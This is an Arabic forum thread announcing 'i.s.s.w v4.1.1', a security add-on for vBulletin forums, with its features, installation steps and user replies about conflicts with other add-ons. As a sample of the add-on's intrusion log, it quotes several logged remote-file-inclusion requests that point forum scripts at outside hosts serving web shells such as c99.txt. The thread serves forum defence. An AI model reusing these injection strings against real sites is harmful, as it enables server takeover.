هاكـ الحماية الشاملة i.s.s.w v 4.1.1

الحالة
مغلق ولا يسمح بالمزيد من الردود.

محمد العباسي

:: عضو بارز ::
أحباب اللمة
إنضم
11 أكتوبر 2007
المشاركات
1,362
نقاط التفاعل
37
النقاط
37
الجنس
ذكر
السلام عليكم ورحمة الله وبركاته​


اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني



vistalogo.gif

عمل الهاك : حماية المنتدى بشكل كامل بعون الله​





2043.imgcache.gif

issw2.JPG


الخيار الاول : لتشغيل حمايه المنتدي​

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح​

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%​

حجب عدة مواقع تساعد على العبث في المنتديات​

تطوير للدوال القديمة للتوافق معه السيرفر​

منع اكثر اوامر اليونكس وحيل الحقن في الشيل​

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك
1%20(79).gif

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع​


الان نأتي للقسم الاكثر اثارة للموضوع​

عند دخولك مجلد sec​

افتح الملف logfile_hacker.txt​

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل​


كود:
[LEFT]2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808 [/LEFT]
 
 
[LEFT]2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808 [/LEFT]
 
 
 
[LEFT]2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79 [/LEFT]
 
 
[LEFT]2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) [/LEFT]
الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر​

طبعا الفاصلة تفصل بين كل معلومه ومعلومة​


كود PHP:​

,



التاريخ والوقت​

كود:
[LEFT]2007-12-11, 05:50:44[/LEFT]
,






عدد المحاولات​



كود:
1197370244



ايبي الموقع المصااب​



كود:
209.67.223.188




الاصابة طبعا تشفرت لاغراض امنيه​



كود:
p=11575//codebb/lang_select


الاستغلال​

كود:
[LEFT]?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? [/LEFT]
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه​



كود:
libwww-perl/5.808





الان شرح التركيب​

امسح جميع هاكات لها علاقه في الحمايه او منع xss​

اما من ركب هاك الحمايه issw v4.0 issw v3​

عليه فقط حذف ملف البرودكت​

وتركيب المحدث​


شرح حذف الهاك​


من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت​

ومن ثم حذف توابعه​

---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt​

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي​

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور​

مع
تحيات الفريق الامني​

الان من لوحت تحكم المنتدي قم برفع البرودكت​


تم تجربت المنتج على الاصدار​

3.6.x​

3.7.0​


لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت​

يطرحه هنا في الموضوع لنصل لتطوير اكثر​


وجل من لا يخطأ وشكرا لكم​



الحمد لله على كل شيء​

لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق​

اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم​


التحميل للزوار

منقووووول و الله
هههه​
 
بارك الله فيك اخي الكريم ...
وتنبيهات هامة جدا بخصوص الهاك إستخلصتها بنفسي لذا لن ترفق في أي موضوع:

أولا : تجنب تركيب الهاك مع هاك الحماية ضد الإستغلال من الأكواد .
ثانيا : تجنب تركيب الهاك في حالة تركيبك للنسخة السحرية vbulletin magic المطروحة من قبل فريق الحماية العربي .
ثالثا : إياك مطلقا أن تفكر ولو للحظة في تركيب هاكي أو أكثر من هاك للحماية :: خصوصا هاك reg أو هاك الجدار الناري ...فهذا يسبب عطبا دائم للقاعدة .
رابعا : حاول عدم نزع الحقوق فيمكن انك تخطأ في أحد الأكواد فتصيب الهاك بخلل .


أتمنى اني لم أطل عليكم وعلى موضوع الأخ محمد .... تقبلوا مروري .
أخوكم في الله أيمن .
 

شكرا أخي على التنبيهات
هذا المنتج يمنع الكثير من أكواد التحويل.
هذا يعمل مثل عمل الأونتي فيروس, أي يجب على كل واحد يحذف هاكات الحماية و يستبدلها بهذا الأخير في منتداه.
هذا المنتج لا يتوافق مع الصندوق الماسي لأبوعمر لأنه يمنع كثير من الكلمات الممنوعة التي يعمل بها الصندوق بطريقة صحيحة.
حماية المنتدى من الفورم هوم كامل الاحصائيات - صندوق المحادثات - اخر 10 مواضيع - وغيرها ...
تحيتي أخي البليدي
 
جزاكـ الله خيرا
 
الحالة
مغلق ولا يسمح بالمزيد من الردود.
لإعلاناتكم وإشهاراتكم عبر صفحات منتدى اللمة الجزائرية، ولمزيد من التفاصيل ... تواصلوا معنا
العودة
Top